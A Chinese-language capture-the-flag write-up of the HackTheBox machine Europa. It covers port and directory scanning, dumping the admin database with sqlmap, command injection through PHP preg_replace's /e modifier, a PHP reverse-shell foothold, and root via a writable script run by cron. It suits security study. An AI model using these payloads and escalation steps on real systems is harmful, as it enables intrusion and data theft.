打靶记录(一三七)之HTBEuropa

端口扫描

┌──(mikannse㉿kali)-[~/HTB/europa]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.22
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-08 22:38 CST
Nmap scan report for 10.10.10.22
Host is up (0.080s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 13.51 seconds

┌──(mikannse㉿kali)-[~/HTB/europa]
└─$ sudo nmap -sT -sV -sC -O -p22,80,443 10.10.10.22
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-08 22:40 CST
Nmap scan report for 10.10.10.22
Host is up (0.067s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6b:55:42:0a:f7:06:8c:67:c0:e2:5c:05:db:09:fb:78 (RSA)
|   256 b1:ea:5e:c4:1c:0a:96:9e:93:db:1d:ad:22:50:74:75 (ECDSA)
|_  256 33:1f:16:8d:c0:24:78:5f:5b:f5:6d:7f:f7:b4:f2:e5 (ED25519)
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Not valid before: 2017-04-19T09:06:22
|_Not valid after:  2027-04-17T09:06:22
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
| tls-alpn: 
|_  http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|phone|storage-misc
Running (JUST GUESSING): Linux 3.X|4.X|5.X (90%), Crestron 2-Series (86%), Google Android 4.X (86%), HP embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/o:google:android:4.0 cpe:/o:linux:linux_kernel:5.0 cpe:/h:hp:p2000_g3
Aggressive OS guesses: Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 3.16 (90%), Linux 3.16 - 4.6 (90%), Linux 3.18 (90%), Linux 3.2 - 4.9 (90%), Linux 3.8 - 3.11 (90%), Linux 4.2 (90%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.60 seconds

添加hosts:

10.10.10.22 europacorp.htb admin-portal.europacorp.htb www.europacorp.htb

在这个admin界面能够扫描到后台登陆界面

┌──(mikannse㉿kali)-[~/HTB/europa]
└─$ feroxbuster -u https://admin-portal.europacorp.htb/ -x rar,php,zip,sql,txt,html,bak --filter-status 404 -k
                                                                                                     
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.4
───────────────────────────┬──────────────────────
 🎯  Target Url            │ https://admin-portal.europacorp.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 💢  Status Code Filters   │ [404]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.4
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [rar, php, zip, sql, txt, html, bak]
 🏁  HTTP methods          │ [GET]
 🔓  Insecure              │ true
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       32w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET       11l       32w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302      GET        0l        0w        0c https://admin-portal.europacorp.htb/ => https://admin-portal.europacorp.htb/login.php
301      GET        9l       28w      341c https://admin-portal.europacorp.htb/js => https://admin-portal.europacorp.htb/js/
302      GET        0l        0w        0c https://admin-portal.europacorp.htb/logout.php => https://admin-portal.europacorp.htb/login.php
200      GET      434l     1004w     8420c https://admin-portal.europacorp.htb/dist/css/sb-admin-2.css
200      GET        9l       46w     1879c https://admin-portal.europacorp.htb/vendor/metisMenu/metisMenu.min.js
200      GET       10l       29w      781c https://admin-portal.europacorp.htb/vendor/metisMenu/metisMenu.min.css
200      GET       47l      163w     1626c https://admin-portal.europacorp.htb/dist/js/sb-admin-2.js
200      GET        4l       66w    29063c https://admin-portal.europacorp.htb/vendor/font-awesome/css/font-awesome.min.css
200      GET        7l      432w    37045c https://admin-portal.europacorp.htb/vendor/bootstrap/js/bootstrap.min.js
301      GET        9l       28w      343c https://admin-portal.europacorp.htb/logs => https://admin-portal.europacorp.htb/logs/
301      GET        9l       28w      343c https://admin-portal.europacorp.htb/data => https://admin-portal.europacorp.htb/data/
200      GET        4l     1292w    86351c https://admin-portal.europacorp.htb/vendor/jquery/jquery.min.js
200      GET        6l     1429w   121200c https://admin-portal.europacorp.htb/vendor/bootstrap/css/bootstrap.min.css
200      GET      122l      240w     3968c https://admin-portal.europacorp.htb/login.php
302      GET        0l        0w        0c https://admin-portal.europacorp.htb/tools.php => https://admin-portal.europacorp.htb/login.php
200      GET        0l        0w        0c https://admin-portal.europacorp.htb/db.php
302      GET        0l        0w        0c https://admin-portal.europacorp.htb/index.php => https://admin-portal.europacorp.htb/login.php

PHP PCRE Functions

在登陆界面抓个包，sqlmap能一把梭

┌──(mikannse㉿kali)-[~/HTB/europa]
└─$ sqlmap -r 1 --risk 3 --level 5 --force-ssl --batch --dump

+----+----------------------+----------+----------------------------------+---------------+
| id | email                | active   | password                         | username      |
+----+----------------------+----------+----------------------------------+---------------+
| 1  | admin@europacorp.htb | 1        | 2b6d315337f18617ba18922c0b9597ff | administrator |
| 2  | john@europacorp.htb  | 1        | 2b6d315337f18617ba18922c0b9597ff | john          |
+----+----------------------+----------+----------------------------------+---------------+

解的admin用户的密码为:SuperSecretPassword!

登录之后比较值得注意的是tool界面，能够输入ip来生成openvpn配置文件,抓包根据参数pattern可以猜测使用了php的正则表达式,我么能够自主更改这个参数规则会导致正则表达式的漏洞,简单的来说就是带上/e后，会执行字符串的命令

漏洞详细见:https://www.madirish.net/402

像是发这样的包:pattern=/(.*)/e&ipaddress=system(‘whoami’);&text=test,那就可以做一个反弹shell了,难绷用nc反弹shell直接卡住了,然后网站服务会直接崩掉只能重置房间,试着上传/usr/share/webshells/php/php-reverse-shell.php来反弹shell

可以用传到/tmp然后php -f 指定来执行

提权

得到db.php,但数据库中都是已知的东西

在/var/www/cronjobs中找到了清除日志用的php脚本,并且在/etc/crontab中每分钟执行一遍

<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>

并且/var/www/cmd/目录www-data是有权限写的，那只要写一个/var/www/cmd/logcleared.sh就可以执行任意命令了

www-data@europa:/tmp$ echo 'cp /root/root.txt /tmp/root.txt;chmod 777 /tmp/root.txt' > /var/www/cmd/logcleared.sh
<ot.txt;chmod 777 /tmp/root.txt' > /var/www/cmd/logcleared.sh                
www-data@europa:/tmp$ chmod +x /var/www/cmd/logcleared.sh
chmod +x /var/www/cmd/logcleared.sh

碎碎念

意外地比较简单的房间，不过php PCRE那里还是第一次遇到(也许之前遇到过但是忘了)